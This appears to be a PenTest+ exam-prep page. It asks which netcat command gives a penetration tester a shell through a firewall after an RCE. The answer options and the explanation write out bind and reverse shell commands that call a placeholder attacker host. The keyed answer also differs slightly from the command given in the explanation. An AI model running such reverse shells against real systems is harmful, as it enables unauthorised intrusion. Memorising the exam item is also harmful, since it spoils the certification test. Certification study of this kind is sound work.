PT0-003 · Question #217
PT0-003 Question #217: Real Exam Question with Answer & Explanation
The correct answer is D: /bin/sh -c 'nc <pentester_ip> 443'. The tester needs to pivot from the compromised web server while bypassing firewall restrictions Inbound traffic only on TCP 443 (HTTPS) and TCP 53 (DNS) Unrestricted outbound traffic Reverse shell using TCP 443: This command initiates an outbound connection to the pentester's mac
Question
A penetration tester finds an unauthenticated RCE vulnerability on a web server and wants to use it to enumerate other servers on the local network. The web server is behind a firewall that allows only an incoming connection to TCP ports 443 and 53 and unrestricted outbound TCP connections. The target web server is https://target.comptia.org. Which of the following should the tester use to perform the task with the fewest web requests?
Options
- Anc -e /bin/sh -lp 53
- B/bin/sh -c 'nc -l -p 443'
- Cnc -e /bin/sh <pentester_ip> 53
- D/bin/sh -c 'nc <pentester_ip> 443'
Explanation
The tester needs to pivot from the compromised web server while bypassing firewall restrictions Inbound traffic only on TCP 443 (HTTPS) and TCP 53 (DNS) Unrestricted outbound traffic Reverse shell using TCP 443: This command initiates an outbound connection to the pentester's machine on port 443, which is allowed by the firewall. /bin/sh -c 'nc <pentester_ip> 443 -e /bin/sh' The pentester listens on TCP 443 and receives the shell from the target.
Topics
Community Discussion
No community discussion yet for this question.